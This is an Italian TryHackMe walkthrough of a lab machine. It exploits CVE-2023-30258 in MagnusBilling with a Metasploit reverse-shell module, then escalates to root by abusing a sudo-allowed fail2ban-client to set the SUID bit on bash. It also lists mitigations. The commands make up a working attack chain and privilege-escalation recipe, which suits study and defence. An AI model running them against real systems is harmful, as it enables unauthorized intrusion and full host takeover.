
Walkthrough passo-passo dello sfruttamento di CVE-2023-30258 (MagnusBilling RCE) e dell'escalation dei privilegi tramite una configurazione errata di fail2ban su un lab TryHackMe. Mostra enumerazione web, sfruttamento con Metasploit ed escalation dei privilegi su Linux.
⸻
🛡️ MagnusBilling RCE → Root (CVE-2023-30258)
📌 Panoramica • Target: 10.145.148.203 • Piattaforma: TryHackMe • Vulnerabilità: CVE-2023-30258 • Accesso: Esecuzione Remota di Codice (RCE) non autenticata • Escalation dei Privilegi: configurazione errata di fail2ban • Accesso Finale: Root
⸻
🔍 1. Ricognizione
Scansione delle Porte
rustscan -a 10.145.148.203
📊 Porte Aperte
Porta Servizio
22 SSH
80 HTTP
3306 MySQL
5038 Asterisk

La presenza di Asterisk suggerisce un sistema VoIP/fatturazione.
⸻
🌐 2. Enumerazione Web
Fuzzing delle Directory
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c
📁 Risultati: • /archive • /assets • /lib • /tmp • /protected
Il percorso /mbilling viene identificato come un potenziale vettore d'attacco.

⸻
🚨 3. Identificazione della Vulnerabilità
CVE-2023-30258
MagnusBilling è vulnerabile a: • Esecuzione Remota di Codice (RCE) non autenticata • Iniezione di Comandi • Compromissione totale del sistema
⸻
💣 4. Sfruttamento (Metasploit)
msfconsole
search CVE:2023-30258
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS 10.145.148.203
set LHOST tun0
set LPORT 4444
run

⸻
🎯 Risultato
sessione meterpreter aperta
sysinfo
OS: Linux Debian User: asterisk
⸻
🔐 5. Accesso Iniziale
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
whoami
asterisk
⸻
🏁 6. Flag Utente
cd /home/magnus cat user.txt
⸻
🔎 7. Escalation dei Privilegi
Controllo sudo
sudo -l
(ALL) NOPASSWD: /usr/bin/fail2ban-client
Configurazione errata critica rilevata!
⸻
💣 8. Sfruttamento di Fail2Ban
Aggiunta di un'azione dannosa
sudo fail2ban-client set mbilling_login addaction evil
sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"
sudo fail2ban-client set mbilling_login banip 127.0.0.1
⸻
🚀 9. Accesso Root
/bin/bash -p
id
euid=0(root)
Inizialmente whoami restituiva asterisk. Utilizzando bash -p si scala a root.
⸻
👑 10. Flag Root
cat /root/root.txt
⸻
🧠 11. Punti Chiave • Lo sfruttamento della CVE ha fornito un facile accesso iniziale • L'enumerazione web è fondamentale (ffuf ha identificato /mbilling) • Un sudo configurato male può portare alla compromissione totale del sistema • fail2ban può essere abusato per l'escalation dei privilegi
⸻
🛡️ 12. Mitigazione • Aggiornare MagnusBilling all'ultima versione • Rimuovere NOPASSWD dalla configurazione di sudo • Limitare l'accesso a fail2ban-client • Rafforzare applicazioni web ed endpoint
⸻
💀 Conclusione
Questa macchina dimostra una catena d'attacco realistica:
RCE Web → Shell → Escalation dei Privilegi → Root
Una combinazione di vulnerabilità + configurazione errata ha portato alla compromissione totale del sistema.